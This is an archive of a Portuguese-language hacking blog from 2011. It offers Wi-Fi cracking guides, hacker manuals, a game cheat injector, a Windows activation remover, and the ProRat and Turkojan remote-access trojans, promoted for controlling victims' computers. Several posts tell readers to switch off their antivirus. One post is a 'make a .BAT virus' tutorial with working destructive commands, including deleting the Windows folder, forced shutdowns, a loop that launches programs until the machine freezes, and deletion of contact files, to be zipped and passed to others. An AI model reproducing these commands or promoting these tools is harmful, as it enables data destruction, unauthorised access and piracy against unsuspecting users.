Por Causa do fechamento do Megaupload e contras excluídas o site foi fechado
Mostrando postagens com marcador Hacker. Mostrar todas as postagens
Mostrando postagens com marcador Hacker. Mostrar todas as postagens

quarta-feira, 21 de dezembro de 2011

Invadindo internet sem fio (wi-fi)


O tutorial mostra a você todas as ferramentas ou softwares que devem ser utilizados em conjunto para que você possa realizar a descoberta de uma senha da rede wireless que você quiser, que esteja a seu alcance logicamente,
existem métodos diferentes para cada tipo de rede, e tudo isso é mostrado nesse tutorial.Os links para download das ferramentas também estão disponíveis no tutorial, todos os softwares utilizados são grátis, não é necessário pagar por nenhum deles. Alem desse tutorial você recebera também um tutorial sobre redes wireless completo, para ter melhor noção sobre o assunto, e mais um ensinando como montar 5 tipos de antenas wireless e quais materiais utilizar, para captar melhor o sinal de internet sem fio.

DOWNLOAD


sexta-feira, 8 de julho de 2011

Apostila Hacker Para Iniciantes e Guia do Hacker

2 Apostilas Hacker Incríveis


Apostila Para Iniciantes

Introdução 

Segurança 
O que é ser um Hacker?
O que eu tenho que fazer para ser um Hacker? 
O que é um vírus de computador? 
Protocolos TCP/IP o que são? 
Dicionário Hacker 
Produtos Exclusivos Mundo Dos Hackers 
Conclusão


Guia do Hacker

Introdução

Prefácio 
Introdução à segurança
Definições de segurança 
Segurança em informática 
Estamos seguros?
Características de um sistema inseguro 
Administrador
Sistemas operacionais
A segurança ao longo da história
Invasores digitais
Hackers 
Crackers
Phreakers 
Funcionários 
Mitos e fantasias 
Engenharia social
Como conseguir uma política eficiente de proteção
Analisando o nível de perigo
A influência do sistema operacional
Unix versus Windows
Vantagens do open source 
Configurações malfeitas 
Ataques restritos a um tipo de sistema
Ataques universais intra-sistemas
Recusa de serviço e invasão 
Protocolos , ferramentas de rede e footprinting
Protocolos 
Tipos de protocolos 
Protocolos Abertos
Protocolos Específicos
Tipos de transmissão de dados
Unicast
Broadcast
Multicast 
NetBios 
IPX/SPX
AppleTalk 
TCP/IP
IP
Portas
DNS
SMTP
POP3
TELNET
FTP
HTTP
SNMP 
Ferramentas TCP/IP
Programinhas úteis 
Arp
FTP
IPCONFIG
Nbtstat
Ping
Telnet
Tracert
Winipcfg 
Footprinting
Whois
Análise de homepages
Pesquisa geral 
Ferramentas e segredos
Trojans
Definição de Trojan
Perigo real
Tipos de cavalo de tróia
Invasão por portas TCP e UDP
Trojans de informação
Trojans de ponte 
Rootkits
Trojans comerciais
Escondendo o trojan em arquivos confiáveis
Utilizando compressores de executáveis 
Spoofando uma porta
Métodos eficazes e os não tão eficazes de se retirar o programa
Detecção por portas
Detecção pelo arquivo 
Detecção por string
Detecção manual
Passo-a-passo: cavalos de tróia
Utilizando um trojan
Utilizando o Anti-Trojans
Denial of Service 
Definição 
Danos sem invasões
Utilizando o broadcast como arma 
Syn-flood 
OOB
Smurf 
Softwares Zumbis 
Diminuindo o impacto causado pelos ataques
Sniffers
Definição 
Filtrando pacotes na rede 
Capturando senhas
Sniffers em trojans
Roteadores
Anti-Sniffers 
Scanners 
Definição 
Descobrindo falhas em um host
Portas abertas com serviços ativos
Máquinas ativas da subnet 
Scanneando o netbios 
Checando as vulnerabilidades em servidores HTTP e FTP
Analisando partes físicas 
Wardialers
Instalando proteções 
Passo-a-passo: Scanneando 
Scanneando hosts conhecidos de uma rede
Scanneando o NetBIOS
Scanneando à procura de falhas
Criptografia
Introdução
Chaves públicas e privadas
PGP
Saídas alternativas 
Crackeando 
Conceito de “crackear”
Wordlists
O processo de bruteforce 
Senhas padrões 
Multi-bruteforce
Política de senhas não-crackeáveis 
Falhas
Definição 
Como surge o bug
Exemplos de falhas
Buffer overflows
Race condition
Descobrindo se algum sistema têm falhas 
Utilizando exploits
Instalando patches
Anonimidade
Ser anônimo na rede 
Usando o anonymizer 
Proxys
Wingates 
Remailers
Shells 
Outdials
IP Spoof.
Non-blind spoof
Blind spoof 
Sistemas operacionais
Unix e Linux
Como tudo começou
Autenticação de senhas – a criptografia DES
Shadowing
SSH, Telnet e Rlogin
Vírus e trojans
Buffer overflows e condição de corrida
Aumentando a segurança do sistema 
Microsoft
Como tudo começou
Diferenças das plataforma Windows ME e 2000
Autenticação de senhas
Vírus e trojans
Buffer overflows
Badwin
Worms 
Aumentando a segurança do sistema
DOS
Por quê o DOS?
Arquivos BAT
Badcoms 
Caracteres ALT
Macros do doskey
Variáveis do sistema
Comandos ANSI
Velhos truques
Aprendendo a se proteger
Firewall
Conceito de Firewal
Eficiência
Firewall analizando a camada de rede  
Firewall analizando a camada de aplicação
Conclusão 
Códigos-fonte 
A importância da programação
Por quê programar?
Linguagens orientadas a objeto
Aprendendo a usar o Delphi 
Instalando os componentes necessários
Algoritmo
Object Pascal 
Criando os aplicativos
Visão gera
Trojan simples 
Mini-firewall
Perguntas mais frequentes
O que é um FAQ (perguntas mais frequentes)?
Como descobrir o ip e derrubar pessoas em um bate-papo
Como posso diferenciar trojans de anti-trojans com um scanner? 
Eu posso usar o telnet para entrar em qualquer porta? 
Por quê você colocou tão pouco de Linux / Unix no livro?
Você me ajuda a invadir o sistema fulano de tal?
Conhecendo mais do assunto
Sites de segurança versus sites de hackers
A importância do profissional de segurança
Sites com matérias sobre o assunto
Filmes
Livros
MEGAUPLOAD

sábado, 21 de maio de 2011

Hacker para combat arms UNLOOKs + INJETOREs + T.K.O

 Um excelente hacker para Combat Arms


Desative seu Antivirus!

COMO INSTALAR

Abra a pasta UNLOOK'S e instale o passo 1 e o passo 2
depois disso vai aparecer uma pasta no seu desktop com o nome de Matrix Hacker
dentro da pasta click em X1nject
configure assim:
What to inject: Engine.exe
How to injection: Automatically
Click em Browser e selecione Matrix - T.K.O.dll

vai ficar assim:


pronto
agora e so começar o jogo e se divertir

Tamanho: 30 MB

quinta-feira, 19 de maio de 2011

Como Fazer um Vírus Formato .BAT

Este e um tutorial de como fazer virus .BAT com o bloco de notas
A responsabilidade das conseqüências serão somente sua!


Primeiramente vá em Iniciar -> Todos os Programas -> Acessórios -> Bloco de Notas.


Quando já estiver com o bloco de notas aberto, digite os códigos que estará logo abaixo.
Quando digitar os códigos vá em Arquivo -> Salvar como... e salve o arquivo com a extensão .bat


Ex: trojan.bat
Sempre salve com esta extensão.


Pronto o vírus ja esta feito, agora e só colocar no winrar.
Com esses virus você pode fazer de uma brincadeira inofensiva ou até destruir completamente  qualquer computador.


REINICIAR O COMPUTADOR
shutdown -r -f



DESLIGAR O COMPUTADOR
shutdown -s -f



DELETA TUDO DENTRO DO WINDOWS
del /s /q c:\windows\



ABRE VÁRIOS PROGRAMAS ATÉ O COMPUTADOR TRAVAR
@echo off
rem Denial Of Service Local
:Fucker
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
goto Fucker:



CONGELA TODOS OS MSNs ABERTOS
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*



ABRE UMA MENSAGEM DE ERRO INFINITA
@ECHO OFF
:REPETE
MSG * CLICK EM MIM
GOTO REPETE

terça-feira, 10 de maio de 2011

Cheat Engine 6.0

Mais tempo para completas as fases, vidas infinitas e a munição dos seus sonhos. Tudo isso em seus games!



Roubar nos games não é uma prática muito legal, mas de vez em quando pode ser a única maneira de derrotar aquele poderoso chefe! Seja para testar seu conhecimento em manipular processos ou ganhar aquela força extra para derrotar monstrengos, Cheat Engine é uma ferramenta que garante seus super poderes na maioria dos games.

Cheat avançado

As ferramentas de cheat mais simples são programadas apenas para determinados jogos e não funcionam com qualquer game. Já para operar as mais completas, como o Cheat Engine, recomenda-se algum conhecimento em programação. Com estas você adentra nos processos do game e alterar determinados valores (quantidade de vida, munição e etc.).
Tudo bem, se você nunca utilizou uma ferramenta similar e não faz a menor ideia de como os processos ocorrem na máquina, Cheat Engine pode resultar em mais dores de cabeça do que em super poderes. Mas com um pouco de dedicação e um conhecimento básico de inglês, os tutoriais do programa garantem que você se torne um mestre dos truques.


Sistema operacional: XP, Vista, 7
Tamanho: 4,45 MB

segunda-feira, 9 de maio de 2011

Remover WAT (WIN7)

Este é um excelente ativador.

Ele remove completamente o sistema de ativação do Windows 7.



Sistema operacional: Windows 7
Tamanho: 3,840 KB

domingo, 8 de maio de 2011

Resetar Senha do Windows

Esqueceu a senha de administrador ou usuário do seu Windows (XP, Vista ou Win. 7)?
Quer saber qual a senha da BIOS/CMOS do seu computador?

É técnico, e ao fazer manutenção em um PC, precisa ficar ligando para o dono para saber as senhas?
Esta é a ferramenta certa para você!!!
Não precisa gravar em CD, ela roda a partir Pen Drive. 



Sistema operacional: Windows XP/Vista/7
Tamanho: 2,8 MB
Formato: ISO

Prorat v2.0

Nova versão do Prorat, um dos melhores programas para invasão.
A responsabilidade das conseqüências serão somente sua!


ProRat é possivel várias ações interessantes, porém a maioria das ações é contra a lei.


O prorat possui uma forma de criar trojan (cavalo de troia) intão muitos AV vão detectar, então se o seu detectar você pode simplimente desativalo para instalar e toda vez que for usar (igual eu faço). Para instalar extria (descompactar) o prorat (recomendo Winrar).

Sistema operacional: XP, Vista, 7
Tamanho: 3,2 MB

Turkojan 4 + Ícones

Nova versão completa do melhor Trojan da atualidade!
A responsabilidade das conseqüências serão somente sua!


- Suporte a conexão reversa

- Ícones personalizados

- Server com compressao UPX

- Menu Em Português

- Facilidade de Uso

-Idioma: Português

Turkojan é um trojan que tem a função de se instalar no computador da vítima e ter comtrole total do computador, como fazer download das vítima, ver o que está fazendo e etc.

Sistema operacional: XP, Vista, 7
Tamanho: 5 MB